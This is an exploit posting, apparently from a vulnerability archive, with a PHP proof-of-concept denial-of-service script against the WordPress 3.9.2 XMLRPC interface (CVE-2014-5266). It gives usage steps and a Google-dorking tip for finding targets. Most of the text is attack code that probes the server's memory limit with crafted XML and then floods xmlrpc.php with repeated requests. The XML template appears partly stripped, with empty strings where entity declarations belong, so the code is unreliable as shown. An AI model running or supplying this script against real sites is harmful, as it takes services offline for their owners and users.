============================================================================================================================================= | # Title : WordPress XMLRPC v3.9.2 Denial of Service vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.WordPress.org/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code performs a Denial of Service (DoS) attack against WordPress' XMLRPC interface, which had a vulnerability that was consuming server resources when sending large requests. (Related : https://packetstorm.news/files/id/180506/ Linked CVE numbers: CVE-2014-5266 ), [+] save code as poc.php. [+] Set taget : Line 84. [+] USage : php poc.php [+] PayLoad : target = $target; $this->requestLimit = $requestLimit; $this->defaultLimit = $defaultLimit; $this->fingerprintStep = $fingerprintStep; } private function sendRequest($xml) { $ch = curl_init($this->target . '/xmlrpc.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $xml); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: text/xml']); curl_setopt($ch, CURLOPT_TIMEOUT, 3); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return $httpCode; } private function fingerprint() { $memoryToUse = $this->fingerprintStep; while ($memoryToUse < 1024) { echo "Trying memory limit {$memoryToUse}MB\n"; $xml = $this->generateXML($memoryToUse); $responseCode = $this->sendRequest($xml); if ($responseCode == 500) { $lastLimit = $memoryToUse - $this->fingerprintStep; echo "Got an error - using limit {$lastLimit}MB\n"; return $lastLimit; } $memoryToUse += $this->fingerprintStep; } echo "Cannot determine limit, using default of {$this->defaultLimit}MB\n"; return $this->defaultLimit; } private function generateXML($size) { $entity = bin2hex(random_bytes(2)); $doctype = bin2hex(random_bytes(3)); $param1 = bin2hex(random_bytes(3)); $param2 = bin2hex(random_bytes(3)); $sizeBytes = $size * 1024; $xmlTemplate = "" . "]" . "" . "&{$entity};" . "" . "{$param1}" . "{$param2}" . ""; return $xmlTemplate; } public function run() { echo "Fingerprinting memory limit...\n"; $size = $this->fingerprint(); echo "Using {$size}MB as memory limit\n"; $xml = $this->generateXML($size); for ($i = 1; $i <= $this->requestLimit; $i++) { echo "Sending request #{$i}...\n"; $this->sendRequest($xml); } } } $target = "http://example.com"; // ضع هنا رابط الهدف $attack = new WordpressXMLRPCDoS($target); $attack->run(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================